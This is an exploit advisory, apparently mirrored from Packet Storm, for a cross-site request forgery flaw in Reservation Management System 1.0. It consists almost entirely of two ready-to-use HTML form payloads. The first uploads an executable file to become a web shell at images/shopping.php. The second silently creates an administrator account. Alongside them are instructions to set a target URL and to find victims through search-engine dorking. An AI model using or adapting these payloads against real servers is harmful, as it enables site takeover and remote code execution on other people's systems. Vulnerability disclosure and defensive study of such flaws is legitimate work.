Share
## https://sploitus.com/exploit?id=PACKETSTORM:181532
=============================================================================================================================================  
| # Title : Reservation Management System 1.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The following html code uploads a executable malicious file remotely .  
  
[+] Line 8 : Set your target url  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<div class="modal-content">  
<div class="modal-header">  
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">ร—</button>  
<h4 class="modal-title">Add New Menu</h4>  
</div>  
<div class="modal-body">  
<!--start form-->  
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">  
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Menu Name</label>  
<div class="col-lg-8">   
<input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Category</label>  
<div class="col-lg-8">   
<select class="form-control select2" id="exampleSelect1" name="cat" required="">  
<option value="9">Dessert</option>  
<option value="6">Main Course</option>  
<option value="7">Pasta</option>  
<option value="10">Rice</option>  
</select>  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Subcategory</label>  
<div class="col-lg-8">   
<select class="form-control select2" id="exampleSelect1" name="subcat">  
<option>Drinks</option>  
<option>Lunch and Dinner</option>  
<option>Mirienda</option>  
<option>Non Combo Meal</option>  
</select>  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Description</label>  
<div class="col-lg-8">   
<textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Price</label>  
<div class="col-lg-8">   
<input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Image</label>  
<div class="col-lg-8">   
<input type="file" class="form-control" name="image" id="title">  
</div>  
</div>   
  
<!-- Buttons -->  
<div class="form-group">  
<!-- Buttons -->  
<div class="col-lg-offset-2 col-lg-6">  
<button type="submit" class="btn btn-sm btn-primary">Save</button>  
<button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
</div>  
</div>  
</form>  
<!--end form-->  
</div>  
  
</div>  
  
[+] Ev!L : http://127.0.0.1/reservation/images/shopping.php  
  
-----------[+] Part 02 Add Admin [+]-------------------  
  
[+] Line 8 : Set your target url  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<div class="modal-content">  
<div class="modal-header">  
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">ร—</button>  
<h4 class="modal-title">Add New User</h4>  
</div>  
<div class="modal-body">  
<!--start form-->  
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">  
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Full Name</label>  
<div class="col-lg-8">   
<input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="username">Username</label>  
<div class="col-lg-8">   
<input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="password">Password</label>  
<div class="col-lg-8">   
<input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">  
</div>  
</div>   
  
<!-- Buttons -->  
<div class="form-group">  
<!-- Buttons -->  
<div class="col-lg-offset-2 col-lg-6">  
<button type="submit" class="btn btn-sm btn-primary">Save</button>  
<button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
</div>  
</div>  
</form>  
<!--end form-->  
</div>  
  
</div>  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================